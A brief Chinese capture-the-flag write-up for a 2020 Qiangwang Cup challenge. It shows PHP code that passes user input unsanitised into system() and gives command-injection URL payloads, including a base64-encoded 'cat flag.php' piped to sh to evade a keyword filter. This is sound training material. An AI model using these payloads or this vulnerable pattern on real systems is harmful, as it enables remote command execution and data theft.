跳转至
2020 | 强网杯 | 强网先锋

主动

解题思路

  • 首页给出了网站的源码,仅过滤变量ip中的关键词flag,可以利用system函数执行命令
    <?php
    highlight_file("index.php");
    if(preg_match("/flag/i", $_GET["ip"]))
    {
        die("no flag");
    }
    system("ping -c 3 $_GET[ip]");
    ?>
    
  • http://39.96.23.228:10002?ip=|ls .查看当前目录,发现flag.php
    发现 flag 文件
  • 使用 Base64 编码绕过,http://39.96.23.228:10002?ip=| echo Y2F0IGZsYWcucGhw | base64 -d | sh,由于highlight_file函数的影响,未直接在网页上显示,可用查看器查看
    获得 Flag

最后更新: 2020年10月26日 10:36:26
Contributors: YanhuiJessica

评论